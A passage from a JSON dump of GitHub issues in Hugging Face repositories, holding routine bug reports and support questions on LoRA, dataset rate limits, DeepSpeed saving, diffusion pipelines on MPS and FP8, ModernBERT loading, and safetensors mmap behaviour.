"https://github.com/huggingface/chat-ui/issues/1633", "state": "open", "labels": [ "support" ], "created_at": "2024-12-23T08:36:09Z", "updated_at": "2025-01-06T07:30:46Z", "comments": 1, "user": "sebastiangonsal" }, { "repo": "huggingface/peft", "number": 2293, "title": "Is it possible to add LoRA on specific head?", "body": "### Feature request\n\nCould I add LoRA only to some selected heads on the model?\r\nI read some documentation [here](https://huggingface.co/docs/peft/developer_guides/custom_models), but am still not sure about how to implement my goal.\n\n### Motivation\n\nCurrent LoRA Config can allow users to decide where matrices to add LoRA, a more fine-grained control on which heads to add LoRA would be beneficial for the developers.\n\n### Your contribution\n\nI would appreciate some tips on how to implement this.", "url": "https://github.com/huggingface/peft/issues/2293", "state": "closed", "labels": [], "created_at": "2024-12-22T19:57:54Z", "updated_at": "2025-12-14T10:07:49Z", "comments": 12, "user": "SpeeeedLee" }, { "repo": "huggingface/datasets", "number": 7344, "title": "HfHubHTTPError: 429 Client Error: Too Many Requests for URL when trying to access SlimPajama-627B or c4 on TPUs", "body": "### Describe the bug\n\nI am trying to run some trainings on Google's TPUs using Huggingface's DataLoader on [SlimPajama-627B](https://huggingface.co/datasets/cerebras/SlimPajama-627B) and [c4](https://huggingface.co/datasets/allenai/c4), but I end up running into `429 Client Error: Too Many Requests for URL` error when I call `load_dataset`. The even odder part is that I am able to sucessfully run trainings with the [wikitext dataset](https://huggingface.co/datasets/Salesforce/wikitext). Is there something I need to setup to specifically train with SlimPajama or C4 with TPUs because I am not clear why I am getting these errors.\r\n\r\n\n\n### Steps to reproduce the bug\n\nThese are the commands you could run to produce the error below but you will require a ClearML account (you can create one [here](https://app.clear.ml/login?redirect=%2Fdashboard)) with a queue setup to run on Google TPUs\r\n```bash\r\ngit clone https://github.com/clankur/muGPT.git\r\ncd muGPT\r\npython -m train --config-name=slim_v4-32_84m.yaml +training.queue={NAME_OF_CLEARML_QUEUE}\r\n```\r\n\r\nThe error I see:\r\n```\r\nTraceback (most recent call last):\r\n File \"/home/clankur/conda/envs/jax/lib/python3.10/site-packages/clearml/binding/hydra_bind.py\", line 230, in _patched_task_function\r\n return task_function(a_config, *a_args, **a_kwargs)\r\n File \"/home/clankur/.clearml/venvs-builds/3.10/task_repository/muGPT.git/train.py\", line 1037, in main\r\n main_contained(config, logger)\r\n File \"/home/clankur/.clearml/venvs-builds/3.10/task_repository/muGPT.git/train.py\", line 840, in main_contained\r\n loader = get_loader(\"train\", config.training_data, config.training.tokens)\r\n File \"/home/clankur/.clearml/venvs-builds/3.10/task_repository/muGPT.git/input_loader.py\", line 549, in get_loader\r\n return HuggingFaceDataLoader(split, config, token_batch_params)\r\n File \"/home/clankur/.clearml/venvs-builds/3.10/task_repository/muGPT.git/input_loader.py\", line 395, in __init__\r\n self.dataset = load_dataset(\r\n File \"/home/clankur/conda/envs/jax/lib/python3.10/site-packages/datasets/load.py\", line 2112, in load_dataset\r\n builder_instance = load_dataset_builder(\r\n File \"/home/clankur/conda/envs/jax/lib/python3.10/site-packages/datasets/load.py\", line 1798, in load_dataset_builder\r\n dataset_module = dataset_module_factory(\r\n File \"/home/clankur/conda/envs/jax/lib/python3.10/site-packages/datasets/load.py\", line 1495, in dataset_module_factory\r\n raise e1 from None\r\n File \"/home/clankur/conda/envs/jax/lib/python3.10/site-packages/datasets/load.py\", line 1479, in dataset_module_factory\r\n ).get_module()\r\n File \"/home/clankur/conda/envs/jax/lib/python3.10/site-packages/datasets/load.py\", line 1034, in get_module\r\n else get_data_patterns(base_path, download_config=self.download_config)\r\n File \"/home/clankur/conda/envs/jax/lib/python3.10/site-packages/datasets/data_files.py\", line 457, in get_data_patterns\r\n return _get_data_files_patterns(resolver)\r\n File \"/home/clankur/conda/envs/jax/lib/python3.10/site-packages/datasets/data_files.py\", line 248, in _get_data_files_patterns\r\n data_files = pattern_resolver(pattern)\r\n File \"/home/clankur/conda/envs/jax/lib/python3.10/site-packages/datasets/data_files.py\", line 340, in resolve_pattern\r\n for filepath, info in fs.glob(pattern, detail=True).items()\r\n File \"/home/clankur/conda/envs/jax/lib/python3.10/site-packages/huggingface_hub/hf_file_system.py\", line 409, in glob\r\n return super().glob(path, **kwargs)\r\n File \"/home/clankur/.clearml/venvs-builds/3.10/lib/python3.10/site-packages/fsspec/spec.py\", line 602, in glob\r\n allpaths = self.find(root, maxdepth=depth, withdirs=True, detail=True, **kwargs)\r\n File \"/home/clankur/conda/envs/jax/lib/python3.10/site-packages/huggingface_hub/hf_file_system.py\", line 429, in find\r\n out = self._ls_tree(path, recursive=True, refresh=refresh, revision=resolved_path.revision, **kwargs)\r\n File \"/home/clankur/conda/envs/jax/lib/python3.10/site-packages/huggingface_hub/hf_file_system.py\", line 358, in _ls_tree\r\n self._ls_tree(\r\n File \"/home/clankur/conda/envs/jax/lib/python3.10/site-packages/huggingface_hub/hf_file_system.py\", line 375, in _ls_tree\r\n for path_info in tree:\r\n File \"/home/clankur/conda/envs/jax/lib/python3.10/site-packages/huggingface_hub/hf_api.py\", line 3080, in list_repo_tree\r\n for path_info in paginate(path=tree_url, headers=headers, params={\"recursive\": recursive, \"expand\": expand}):\r\n File \"/home/clankur/conda/envs/jax/lib/python3.10/site-packages/huggingface_hub/utils/_pagination.py\", line 46, in paginate\r\n hf_raise_for_status(r)\r\n File \"/home/clankur/conda/envs/jax/lib/python3.10/site-packages/huggingface_hub/utils/_http.py\", line 477, in hf_raise_for_status\r\n raise _format(HfHubHTTPError, str(e), response) from e\r\nhuggingface_hub.errors.HfHubHTTPError: 429 Client Error: Too Many Requests for url: https://huggingface.co/api/datasets/cerebras/SlimPajama-627B/tree/2d0accdd58c5d5511943ca1f5ff0e3eb5e293543?recursive=True&", "url": "https://github.com/huggingface/datasets/issues/7344", "state": "closed", "labels": [], "created_at": "2024-12-22T16:30:07Z", "updated_at": "2025-01-15T05:32:00Z", "comments": 2, "user": "clankur" }, { "repo": "huggingface/diffusers", "number": 10345, "title": "safetensor streaming in from_single_file_loading()", "body": "can we add support for streaming safetensors while loading using `from_single_file`.\r\nsource:https://github.com/run-ai/runai-model-streamer\r\n\r\nexample:\r\n```python\r\nfrom runai_model_streamer import SafetensorsStreamer\r\n\r\nfile_path = \"/path/to/file.safetensors\"\r\n\r\nwith SafetensorsStreamer() as streamer:\r\n streamer.stream_file(file_path)\r\n for name, tensor in streamer.get_tensors():\r\n tensor.to('CUDA:0')\r\n```", "url": "https://github.com/huggingface/diffusers/issues/10345", "state": "closed", "labels": [ "stale" ], "created_at": "2024-12-22T13:27:46Z", "updated_at": "2025-01-21T15:07:58Z", "comments": 2, "user": "AbhinavJangra29" }, { "repo": "huggingface/accelerate", "number": 3309, "title": "deepspeed zero3 how to save custom model\uff1f", "body": "DeepSpeedEngine(\r\n (module): LLMDecoder(\r\n (model): Qwen2ForSequenceClassification(\r\n (model): Qwen2Model(\r\n (embed_tokens): Embedding(151936, 1536)\r\n (layers): ModuleList(\r\n (0-27): 28 x Qwen2DecoderLayer(\r\n (self_attn): Qwen2SdpaAttention(\r\n (q_proj): Linear(in_features=1536, out_features=1536, bias=True)\r\n (k_proj): Linear(in_features=1536, out_features=256, bias=True)\r\n (v_proj): Linear(in_features=1536, out_features=256, bias=True)\r\n (o_proj): Linear(in_features=1536, out_features=1536, bias=False)\r\n (rotary_emb): Qwen2RotaryEmbedding()\r\n )\r\n (mlp): Qwen2MLP(\r\n (gate_proj): Linear(in_features=1536, out_features=8960, bias=False)\r\n (up_proj): Linear(in_features=1536, out_features=8960, bias=False)\r\n (down_proj): Linear(in_features=8960, out_features=1536, bias=False)\r\n (act_fn): SiLU()\r\n )\r\n (input_layernorm): Qwen2RMSNorm((0,), eps=1e-06)\r\n (post_attention_layernorm): Qwen2RMSNorm((0,), eps=1e-06)\r\n )\r\n )\r\n (norm): Qwen2RMSNorm((0,), eps=1e-06)\r\n (rotary_emb): Qwen2RotaryEmbedding()\r\n )\r\n (score): Linear(in_features=1536, out_features=1, bias=False)\r\n )\r\n )\r\n)\r\nHello, the above is my model structure. In short, I use a custom LLMDecoder, which has a variable named model which is a Qwen2ForSequenceClassification object.\r\nIn this case, how should I save the model in deepspeed zero3?\r\n\r\nThe following code is not suitable for my model structure, how should I modify it?\r\n\r\n\r\nunwrapped_model = accelerator.unwrap_model(model)\r\nunwrapped_model.save_pretrained(\r\n args.output_dir,\r\n is_main_process=accelerator.is_main_process,\r\n save_function=accelerator.save,\r\n state_dict=accelerator.get_state_dict(model),\r\n)", "url": "https://github.com/huggingface/accelerate/issues/3309", "state": "closed", "labels": [], "created_at": "2024-12-21T17:01:17Z", "updated_at": "2025-01-30T15:06:45Z", "user": "NLPJCL" }, { "repo": "huggingface/diffusers", "number": 10334, "title": "Sana broke on MacOS. Grey images on MPS, NaN's on CPU.", "body": "### Describe the bug\n\nJust started to play with Sana, was excited when I saw it was coming to Diffusers as the NVIDIA supplied code was full of CUDA only stuff.\r\nRan the example code, changing cuda to mps and got a grey image.\r\n\r\n![output](https://github.com/user-attachments/assets/f8f230d2-c025-437a-adf4-9bbb76767a65)\r\n\r\nRemoved the move to MPS to run it on the CPU and the script failed with\r\n```\r\nimage_processor.py:147: RuntimeWarning: invalid value encountered in cast\r\n``` \r\nthat suggests the latents had NaN's on the CPU.\n\n### Reproduction\n\n```py\r\nimport torch\r\nfrom diffusers import SanaPipeline\r\n\r\npipe = SanaPipeline.from_pretrained(\r\n \"Efficient-Large-Model/Sana_1600M_1024px_diffusers\", torch_dtype=torch.float32\r\n)\r\npipe.to(\"mps\")\r\npipe.text_encoder.to(torch.bfloat16)\r\npipe.transformer = pipe.transformer.to(torch.float16)\r\n\r\nimage = pipe(prompt='a cyberpunk cat with a neon sign that says \"Sana\"')[0]\r\nimage[0].save(\"output.png\")\r\n```\r\n\r\nremoved `pipe.to(\"mps\")` to run on the CPU.\n\n### Logs\n\n```shell\n*** MPS run ***\r\n(Diffusers) $ python sana_test.py\r\nLoading checkpoint shards: 100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 2/2 [00:10<00:00, 5.03s/it]\r\nLoading pipeline components...: 100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 5/5 [00:10<00:00, 2.18s/it]\r\n\r\nSetting `clean_caption=True` requires the Beautiful Soup library but it was not found in your environment. You can install it with pip:\r\n`pip install beautifulsoup4`. Please note that you may need to restart your runtime after installation.\r\n\r\nSetting `clean_caption` to False...\r\nThe 'batch_size' argument of HybridCache is deprecated and will be removed in v4.49. Use the more precisely named 'max_batch_size' argument instead.\r\nThe 'batch_size' attribute of HybridCache is deprecated and will be removed in v4.49. Use the more precisely named 'self.max_batch_size' attribute instead.\r\n\r\nSetting `clean_caption=True` requires the Beautiful Soup library but it was not found in your environment. You can install it with pip:\r\n`pip install beautifulsoup4`. Please note that you may need to restart your runtime after installation.\r\n\r\nSetting `clean_caption` to False...\r\n100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 20/20 [00:49<00:00, 2.48s/it]\r\n(Diffusers) $ \r\n\r\n***CPU run***\r\n\r\n(Diffusers) $ python sana_test.py\r\nLoading checkpoint shards: 100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 2/2 [00:06<00:00, 3.13s/it]\r\nLoading pipeline components...: 100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 5/5 [00:07<00:00, 1.41s/it]\r\n\r\nSetting `clean_caption=True` requires the Beautiful Soup library but it was not found in your environment. You can install it with pip:\r\n`pip install beautifulsoup4`. Please note that you may need to restart your runtime after installation.\r\n\r\nSetting `clean_caption` to False...\r\nThe 'batch_size' argument of HybridCache is deprecated and will be removed in v4.49. Use the more precisely named 'max_batch_size' argument instead.\r\nThe 'batch_size' attribute of HybridCache is deprecated and will be removed in v4.49. Use the more precisely named 'self.max_batch_size' attribute instead.\r\n\r\nSetting `clean_caption=True` requires the Beautiful Soup library but it was not found in your environment. You can install it with pip:\r\n`pip install beautifulsoup4`. Please note that you may need to restart your runtime after installation.\r\n\r\nSetting `clean_caption` to False...\r\n100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 20/20 [20:14<00:00, 60.74s/it]\r\n/Volumes/SSD2TB/AI/Diffusers/lib/python3.11/site-packages/diffusers/image_processor.py:147: RuntimeWarning: invalid value encountered in cast\r\n images = (images * 255).round().astype(\"uint8\")\r\n(Diffusers) $\n```\n\n\n### System Info\n\n- \ud83e\udd17 Diffusers version: 0.32.0.dev0\r\n- Platform: macOS-15.2-arm64-arm-64bit\r\n- Running on Google Colab?: No\r\n- Python version: 3.11.10\r\n- PyTorch version (GPU?): 2.6.0.dev20241219 (False)\r\n- Flax version (CPU?/GPU?/TPU?): not installed (NA)\r\n- Jax version: not installed\r\n- JaxLib version: not installed\r\n- Huggingface_hub version: 0.25.0\r\n- Transformers version: 4.47.1\r\n- Accelerate version: 0.34.2\r\n- PEFT version: not installed\r\n- Bitsandbytes version: not installed\r\n- Safetensors version: 0.4.5\r\n- xFormers version: not installed\r\n- Accelerator: Apple M3\r\n- Using GPU in script?: both\r\n- Using distributed or parallel set-up in script?: no\n\n### Who can help?\n\n@pcuenca", "url": "https://github.com/huggingface/diffusers/issues/10334", "state": "closed", "labels": [ "bug", "stale" ], "created_at": "2024-12-21T11:26:40Z", "updated_at": "2025-01-27T01:26:43Z", "comments": 8, "user": "Vargol" }, { "repo": "huggingface/peft", "number": 2292, "title": "Cannot import name 'EncoderDecoderCache' from 'transformers'", "body": "### System Info\n\ntransformer==4.39.3;peft==0.14.0\r\n\r\n\r\n\r\nMaybe this is from transformer's update,so which version can i use. \n\n### Who can help?\n\n_No response_\n\n### Information\n\n- [ ] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\nfrom src import models\r\nfrom src.utils import IImage, resize\r\nimport numpy as np\r\nfrom src.methods import rasg, sd, sr\r\nfrom PIL import Image\r\nfrom peft import get_peft_model, LoraConfig, TaskType\r\ninp_model = models.load_inpainting_model('ds8_inp', device='cpu', cache=True)\r\nlora_config = LoraConfig(\r\n task_type=TaskType.IMAGE_GENERATION,\r\n inference_mode=True,\r\n r=8,\r\n lora_alpha=16,\r\n lora_dropout=0.05,\r\n)\r\nnew_model = get_peft_model(inp_model.unet, lora_config)\r\nprint(new_model.state_dict().keys())\r\n\n\n### Expected behavior\n\n/root/miniconda3/lib/python3.10/site-packages/timm/models/layers/__init__.py:48: FutureWarning: Importing from timm.models.layers is deprecated, please import via timm.layers\r\n warnings.warn(f\"Importing from {__name__} is deprecated, please import via timm.layers\", FutureWarning)\r\nTraceback (most recent call last):\r\n File \"/root/autodl-tmp/workspace/HD-Painter/paratest.py\", line 6, in \r\n from peft import get_peft_model, LoraConfig, TaskType\r\n File \"/root/miniconda3/lib/python3.10/site-packages/peft/__init__.py\", line 22, in \r\n from .auto import (\r\n File \"/root/miniconda3/lib/python3.10/site-packages/peft/auto.py\", line 32, in \r\n from .mapping import MODEL_TYPE_TO_PEFT_MODEL_MAPPING\r\n File \"/root/miniconda3/lib/python3.10/site-packages/peft/mapping.py\", line 25, in \r\n from .mixed_model import PeftMixedModel\r\n File \"/root/miniconda3/lib/python3.10/site-packages/peft/mixed_model.py\", line 29, in \r\n from .peft_model import PeftModel\r\n File \"/root/miniconda3/lib/python3.10/site-packages/peft/peft_model.py\", line 37, in \r\n from transformers import Cache, DynamicCache, EncoderDecoderCache, PreTrainedModel\r\nImportError: cannot import name 'Cache' from 'transformers' (/root/miniconda3/lib/python3.10/site-packages/transformers/__init__.py)", "url": "https://github.com/huggingface/peft/issues/2292", "state": "closed", "labels": [], "created_at": "2024-12-21T09:00:04Z", "updated_at": "2025-03-31T06:50:20Z", "comments": 4, "user": "Huang-jia-xuan" }, { "repo": "huggingface/sentence-transformers", "number": 3141, "title": "How to load ModernBERT model correctly?", "body": "Hi Teams,\r\n\r\nI want to ask how to properly load [ModernBERT](https://huggingface.co/blog/modernbert) using SentenceTransformer?\r\n\r\nThe main difficulty I met is about the weight loading of prediction head as defined [here](https://github.com/huggingface/transformers/blob/f42084e6411c39b74309af4a7d6ed640c01a4c9e/src/transformers/models/modernbert/modeling_modernbert.py#L1121-L1123) where `ModernBertPredictionHead` is not included in the `AutoModelClass`. I tried to use the following code:\r\n```python\r\nimport torch\r\nfrom sentence_transformers import SentenceTransformer,models\r\nmodel_name_or_path = \"answerdotai/ModernBERT-base\"\r\nmodules = []\r\nmodules.append(models.Transformer(model_name_or_path))\r\n\r\n## head\r\nmodules.append(models.Dense(768,768,activation_function=torch.nn.GELU()))\r\nmodules.append(models.Dense(768,768,activation_function=torch.nn.Identity()))\r\n\r\n## pooling\r\nmodules.append(models.Pooling(768,pooling_mode=\"mean\"))\r\n\r\n## classifier\r\nmodules.append(models.Dense(768,1))\r\n\r\nmodel = SentenceTransformer(modules=modules,device=\"cpu\")\r\n```\r\n\r\nHowever, it seems that `Dense` before `Pooling` is not supported and would throw an error:\r\n```\r\nKeyError: 'sentence_embedding'\r\n```", "url": "https://github.com/huggingface/sentence-transformers/issues/3141", "state": "closed", "labels": [], "created_at": "2024-12-20T06:52:44Z", "updated_at": "2024-12-24T03:08:47Z", "user": "Hannibal046" }, { "repo": "huggingface/picotron", "number": 15, "title": "Difference between picotron and nanotron", "body": "What is the difference between picotron and [nanotron](https://github.com/huggingface/nanotron)? Why huggingface team rolled out two hybrid-parallelism framework?", "url": "https://github.com/huggingface/picotron/issues/15", "state": "closed", "labels": [ "question" ], "created_at": "2024-12-19T12:48:57Z", "updated_at": "2024-12-20T10:17:25Z", "user": "cailun01" }, { "repo": "huggingface/diffusers", "number": 10302, "title": "Using FP8 for inference without CPU offloading can introduce noise.", "body": "### Describe the bug\r\n\r\nIf I use ```pipe.enable_model_cpu_offload(device=device)```, the model can perform inference correctly after warming up. However, if I comment out this line, the inference results are noisy.\r\n\r\n### Reproduction\r\n\r\n```python\r\nfrom diffusers import (\r\n FluxPipeline, \r\n FluxTransformer2DModel\r\n)\r\nfrom transformers import T5EncoderModel, CLIPTextModel,CLIPTokenizer,T5TokenizerFast\r\nfrom optimum.quanto import freeze, qfloat8, quantize\r\nimport torch\r\nfrom diffusers import FlowMatchEulerDiscreteScheduler, AutoencoderKL\r\ndtype = torch.bfloat16\r\nbfl_repo = f\"black-forest-labs/FLUX.1-dev\" \r\ndevice = \"cuda\"\r\nscheduler = FlowMatchEulerDiscreteScheduler.from_pretrained(bfl_repo, subfolder=\"scheduler\", torch_dtype=dtype)\r\ntext_encoder = CLIPTextModel.from_pretrained(bfl_repo, subfolder=\"text_encoder\", torch_dtype=dtype)\r\ntokenizer = CLIPTokenizer.from_pretrained(bfl_repo, subfolder=\"tokenizer\", torch_dtype=dtype, clean_up_tokenization_spaces=True)\r\ntext_encoder_2 = T5EncoderModel.from_pretrained(bfl_repo, subfolder=\"text_encoder_2\", torch_dtype=dtype)\r\ntokenizer_2 = T5TokenizerFast.from_pretrained(bfl_repo, subfolder=\"tokenizer_2\", torch_dtype=dtype, clean_up_tokenization_spaces=True)\r\nvae = AutoencoderKL.from_pretrained(bfl_repo, subfolder=\"vae\", torch_dtype=dtype)\r\n\r\ntransformer = FluxTransformer2DModel.from_single_file(\"https://huggingface.co/Kijai/flux-fp8/blob/main/flux1-dev-fp8.safetensors\", torch_dtype=dtype)\r\nquantize(transformer, weights=qfloat8)\r\nfreeze(transformer)\r\nquantize(text_encoder_2, weights=qfloat8)\r\nfreeze(text_encoder_2)\r\n\r\npipe = FluxPipeline(\r\n scheduler=scheduler,\r\n text_encoder=text_encoder,\r\n tokenizer=tokenizer,\r\n text_encoder_2=text_encoder_2,\r\n tokenizer_2=tokenizer_2,\r\n vae=vae,\r\n transformer=transformer\r\n ).to(device, dtype=dtype) # edit\r\n\r\n# pipe.enable_model_cpu_offload(device=device) \r\nparams = {\r\n \"prompt\": \"a cat\",\r\n \"num_images_per_prompt\": 1,\r\n \"num_inference_steps\":1,\r\n \"width\": 64,\r\n \"height\": 64,\r\n \"guidance_scale\": 7,\r\n }\r\nimage = pipe(**params).images[0] # wamup\r\nparams = {\r\n \"prompt\": \"a cat\",\r\n \"num_images_per_prompt\": 1,\r\n \"num_inference_steps\":25,\r\n \"width\": 512,\r\n \"height\": 512,\r\n \"guidance_scale\": 7,\r\n }\r\nimage = pipe(**params).images[0] \r\nimage.save(\"1.jpg\")\r\n```\r\n\r\n### Logs\r\n\r\n_No response_\r\n\r\n### System Info\r\n\r\nWARNING[XFORMERS]: xFormers can't load C++/CUDA extensions. xFormers was built for:\r\n PyTorch 2.5.1+cu121 with CUDA 1201 (you have 2.4.1+cu121)\r\n Python 3.10.15 (you have 3.10.13)\r\n Please reinstall xformers (see https://github.com/facebookresearch/xformers#installing-xformers)\r\n Memory-efficient attention, SwiGLU, sparse and more won't be available.\r\n Set XFORMERS_MORE_DETAILS=1 for more details\r\n\r\nCopy-and-paste the text below in your GitHub issue and FILL OUT the two last points.\r\n\r\n- \ud83e\udd17 Diffusers version: 0.32.0.dev0\r\n- Platform: Linux-6.8.0-49-generic-x86_64-with-glibc2.35\r\n- Running on Google Colab?: No\r\n- Python version: 3.10.13\r\n- PyTorch version (GPU?): 2.4.1+cu121 (True)\r\n- Flax version (CPU?/GPU?/TPU?): not installed (NA)\r\n- Jax version: not installed\r\n- JaxLib version: not installed\r\n- Huggingface_hub version: 0.26.2\r\n- Transformers version: 4.46.2\r\n- Accelerate version: 0.31.0\r\n- PEFT version: 0.14.0\r\n- Bitsandbytes version: not installed\r\n- Safetensors version: 0.4.3\r\n- xFormers version: 0.0.28.post3\r\n- Accelerator: NVIDIA GeForce RTX 3090, 24576 MiB\r\nNVIDIA GeForce RTX 3090, 24576 MiB\r\n- Using GPU in script?: \r\n- Using distributed or parallel set-up in script?: \r\n\r\n### Who can help?\r\n\r\n@yiyixuxu @DN6", "url": "https://github.com/huggingface/diffusers/issues/10302", "state": "open", "labels": [ "bug" ], "created_at": "2024-12-19T12:39:06Z", "updated_at": "2025-03-10T14:18:58Z", "comments": 6, "user": "todochenxi" }, { "repo": "huggingface/candle", "number": 2674, "title": "[Question] How to create a autograd function like in PyTorch? How to customize forward and backward process?", "body": "", "url": "https://github.com/huggingface/candle/issues/2674", "state": "open", "labels": [], "created_at": "2024-12-19T07:02:04Z", "updated_at": "2024-12-19T07:02:15Z", "user": "VanderBieu" }, { "repo": "huggingface/blog", "number": 2551, "title": "How to process and visualize the segment output tokens?", "body": "How to process the segment tokens and generate segmentation masks? what the output means?\r\n![\u5fae\u4fe1\u56fe\u7247_20241219110946](https://github.com/user-attachments/assets/089e5d16-f133-449a-a0ee-0f7c07e335dc)\r\n", "url": "https://github.com/huggingface/blog/issues/2551", "state": "open", "labels": [], "created_at": "2024-12-19T03:11:15Z", "updated_at": "2024-12-19T03:11:15Z", "user": "00mmw" }, { "repo": "huggingface/transformers", "number": 35316, "title": "How to use a custom Image Processor?", "body": "I want to use the processor in the form of `auto_map` but when using `AutoProcessor.from_pretrained`, I am unable to load the custom `ImageProcessor`.\r\n\r\nThe root cause lies in the use of the `transformers_module` to initialize the class in `ProcessorMixin`. \r\n\r\nhttps://github.com/huggingface/transformers/blob/c7e48053aab09ad11efa2ad12513e9ab56f29563/src/transformers/processing_utils.py#L1018\r\n\r\nEven though I have overridden the _get_arguments_from_pretrained method, this issue still exists in the `__init__`. \r\n\r\nhttps://github.com/huggingface/transformers/blob/c7e48053aab09ad11efa2ad12513e9ab56f29563/src/transformers/processing_utils.py#L383\r\n\r\nPerhaps I could avoid inheriting from ProcessorMixin, but I would like to know if there is a more elegant way to achieve this functionality?", "url": "https://github.com/huggingface/transformers/issues/35316", "state": "closed", "labels": [], "created_at": "2024-12-18T12:04:33Z", "updated_at": "2024-12-19T02:53:43Z", "user": "glamourzc" }, { "repo": "huggingface/diffusers", "number": 10281, "title": "Request to implement FreeScale, a new diffusion scheduler", "body": "### Model/Pipeline/Scheduler description\r\n\r\nFreeScale is a tuning-free method for higher-resolution visual generation, unlocking the 8k image generation for pre-trained SDXL! Compared to direct inference by SDXL, FreeScale brings negligible additional memory and time costs.\r\n\r\n![fig_teaser](https://github.com/user-attachments/assets/3eef38cc-3642-42a7-b5e7-8b32c32ecc77)\r\n\r\n![fig_diff8k](https://github.com/user-attachments/assets/8cec7c55-011e-4434-81e3-1e80dd5dd003)\r\n\r\n\r\n \r\n\r\n### Open source status\r\n\r\n- [X] The model implementation is available.\r\n- [X] The model weights are available (Only relevant if addition is not a scheduler).\r\n\r\n### Provide useful links for the implementation\r\n\r\n- Project: http://haonanqiu.com/projects/FreeScale.html\r\n- Paper: https://arxiv.org/abs/2412.09626\r\n- Code: https://github.com/ali-vilab/FreeScale\r\n- Hugging Face Demo: https://huggingface.co/spaces/MoonQiu/FreeScale\r\n\r\nThe code changes of FreeScale are not complicated, but I do not know how to integrate them into diffusers smoothly. If you have questions about FreeScale, please ask me(@arthur-qiu).", "url": "https://github.com/huggingface/diffusers/issues/10281", "state": "open", "labels": [ "stale", "consider-for-modular-diffusers" ], "created_at": "2024-12-18T06:32:34Z", "updated_at": "2025-01-17T15:02:49Z", "comments": 1, "user": "arthur-qiu" }, { "repo": "huggingface/diffusers", "number": 10280, "title": "Safetensors loading uses mmap with multiple processes sharing the same fd cause slow gcsfuse performance", "body": "### Describe the bug\r\n\r\nWhen I use `StableDiffusionPipeline.from_single_file` to load a safetensors model, I noticed that the loading speed is extremely slow when the file is loaded from GCSFuse (https://cloud.google.com/storage/docs/cloud-storage-fuse/overview).\r\n\r\nThe reason is that the loader creates multiple processes but they all share the same fd and its file handle. As each process reads different offset of the file, it makes the GCSFuse perform really badly because those reads appear to be random read jumping between offsets. For example:\r\n\r\n```\r\nconnection.go:420] <- ReadFile (inode 2, PID 77, handle 1, offset 529453056, 262144 bytes)\r\nconnection.go:420] <- ReadFile (inode 2, PID 78, handle 1, offset 531812352, 262144 bytes)\r\nconnection.go:420] <- ReadFile (inode 2, PID 79, handle 1, offset 534171648, 262144 bytes)\r\nconnection.go:420] <- ReadFile (inode 2, PID 50, handle 1, offset 527351808, 4096 bytes)\r\n```\r\n\r\nThe question I have is why the loading multiple processes share the same fd in the first place? As `mmap` is already used, even the multiple processes don't share the same fd, the kernel will still map the virtual memory for each process back to the same the page cache naturally, so there is no need to share the fd across the fd.\r\n\r\nIf they don't share the fd, GCSFuse will perform much better. Therefore, can we disable the fd sharing?\r\n\r\n### Reproduction\r\n\r\nSimply using GCSFuse to serve a file to `StableDiffusionPipeline.from_single_file`\r\n\r\n### Logs\r\n\r\n_No response_\r\n\r\n### System Info\r\n\r\nN/A\r\n\r\n### Who can help?\r\n\r\n@yiyixuxu @asomoza ", "url": "https://github.com/huggingface/diffusers/issues/10280", "state": "closed", "labels": [ "bug" ], "created_at": "2024-12-18T06:02:41Z", "updated_at": "2025-01-10T10:11:05Z", "comments": 4, "user": "wlhee" }, { "repo": "huggingface/optimum-neuron", "number": 750, "title": 